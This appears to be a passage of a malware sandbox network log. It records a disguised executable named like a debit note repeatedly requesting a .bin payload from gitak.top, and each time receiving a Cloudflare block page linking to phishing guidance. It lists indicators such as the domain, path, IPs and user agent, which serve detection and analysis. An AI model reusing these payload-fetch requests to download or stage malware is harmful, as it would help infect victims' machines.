                              2024-08-26 13:38:43 UTC1369INData Raw: 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 72 4a 38 49 6d 33 4f 48 51 38 50 36 63 35 62 71 36 39 73 41 39 32 55 4c 69 2e 47 79 44 63 31 54 72 33 33 57 4d 50 58 5f 33 4b 4d 2d 31 37 32 34 36 37 39 35 32 33 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73
                              Data Ascii: <input type="hidden" name="atok" value="rJ8Im3OHQ8P6c5bq69sA92ULi.GyDc1Tr33WMPX_3KM-1724679523-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" s
                              2024-08-26 13:38:43 UTC852INData Raw: 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65
                              Data Ascii: r sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare
                              2024-08-26 13:38:43 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              38192.168.11.2049855172.67.207.2194435076C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 13:38:53 UTC168OUTGET /KGukxUu155.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: gitak.top
                              Cache-Control: no-cache
                              2024-08-26 13:38:53 UTC547INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 13:38:53 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=StYHORHP1oFP%2BShKyFIml7AwiFR6wkbu5p9WfGjKm3fEyA%2FTt%2FX6zS%2F8xAtScoHqL%2FpJuO85FPZrtMbWx4SAl3VZVdByjXscoDGRg48w78Lx6bdM2wnjpYfo%2F%2F0%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b94398c9d6a3b24-IAD
                              2024-08-26 13:38:53 UTC822INData Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-08-26 13:38:53 UTC1369INData Raw: 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61
                              Data Ascii: rrors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-a
                              2024-08-26 13:38:53 UTC1369INData Raw: 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 71 72 61 47 59 6a 79 54 42 70 50 66 4b 4c 37 65 69 6a 73 70 42 4d 6a 54 65 62 57 52 47 55 6a 6b 48 36 55 33 46 47 67 65 46 75 59 2d 31 37 32 34 36 37 39 35 33 33 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d
                              Data Ascii: <input type="hidden" name="atok" value="qraGYjyTBpPfKL7eijspBMjTebWRGUjkH6U3FGgeFuY-1724679533-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-
                              2024-08-26 13:38:53 UTC858INData Raw: 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75
                              Data Ascii: parator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Clou
                              2024-08-26 13:38:53 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              39192.168.11.2049856172.67.207.2194435076C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 13:39:03 UTC168OUTGET /KGukxUu155.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: gitak.top
                              Cache-Control: no-cache
                              2024-08-26 13:39:04 UTC537INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 13:39:04 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wi9YmFYAiozCiWwHzCv4USfurhhldaD9%2FsLY9bHcwslxBwO9Ia3KQl1m4hM5qU74B8CMB5hDbo9izlVaz8%2Fs0i4Vk6z8znrzST6og4DTQ8pRJfRVFs2Inr7czPs%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b9439ce39e12d18-IAD
                              2024-08-26 13:39:04 UTC832INData Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-08-26 13:39:04 UTC1369INData Raw: 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 3b 0a 20 20
                              Data Ascii: ss" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert');
                              2024-08-26 13:39:04 UTC1369INData Raw: 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 56 44 39 72 75 4c 6f 77 53 65 48 37 71 68 63 76 33 4b 57 39 76 57 33 62 68 63 33 36 54 64 6a 53 74 4e 55 6b 59 65 56 5f 71 6a 34 2d 31 37 32 34 36 37 39 35 34 34 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65
                              Data Ascii: nput type="hidden" name="atok" value="VD9ruLowSeH7qhcv3KW9vW3bhc36TdjStNUkYeV_qj4-1724679544-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style
                              2024-08-26 13:39:04 UTC848INData Raw: 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61 3e
                              Data Ascii: :hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a>
                              2024-08-26 13:39:04 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              40192.168.11.2049857172.67.207.2194435076C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 13:39:14 UTC168OUTGET /KGukxUu155.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: gitak.top
                              Cache-Control: no-cache
                              2024-08-26 13:39:14 UTC539INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 13:39:14 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z2Syq5B2CuWDpoA0Pi1WssnO0604T5gXrvuhXAlQ4g%2BYwVejucXLTK1FzYjgdi6RK%2BmpK0G9LAQcHMzc4Pqv6dzDTfuOpt2NVd8QIVWdaC2wZ1Cg3X%2BG2ZoeqrY%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b943a0fbb90818c-IAD
                              2024-08-26 13:39:14 UTC830INData Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-08-26 13:39:14 UTC1369INData Raw: 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 3b 0a
                              Data Ascii: .css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert');
                              2024-08-26 13:39:14 UTC1369INData Raw: 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 69 53 76 59 6e 7a 65 6f 33 6a 6e 65 55 47 4b 64 32 39 59 43 4f 69 4e 36 47 62 33 36 6b 61 47 51 42 79 44 4e 33 75 70 44 34 73 67 2d 31 37 32 34 36 37 39 35 35 34 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79
                              Data Ascii: <input type="hidden" name="atok" value="iSvYnzeo3jneUGKd29YCOiN6Gb36kaGQByDN3upD4sg-1724679554-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" sty
                              2024-08-26 13:39:14 UTC850INData Raw: 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f
                              Data Ascii: sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</
                              2024-08-26 13:39:14 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              41192.168.11.2049858172.67.207.2194435076C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 13:39:24 UTC168OUTGET /KGukxUu155.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: gitak.top
                              Cache-Control: no-cache
                              2024-08-26 13:39:25 UTC533INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 13:39:25 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1yxJJHNLb1dEeAaVmSV1w1c0rZS5T54lQdMLUlWehcXHYDGfNdI2a4TUMUhn9SiwQfTXbcyAsJXknWIYkiQiWSmyEFfCwUomA99kRMVyv4jclaDqJjaesAzpSBs%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b943a5158288256-IAD
                              2024-08-26 13:39:25 UTC836INData Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-08-26 13:39:25 UTC1369INData Raw: 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 3b 0a 20 20 20 20 20 20
                              Data Ascii: /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert');
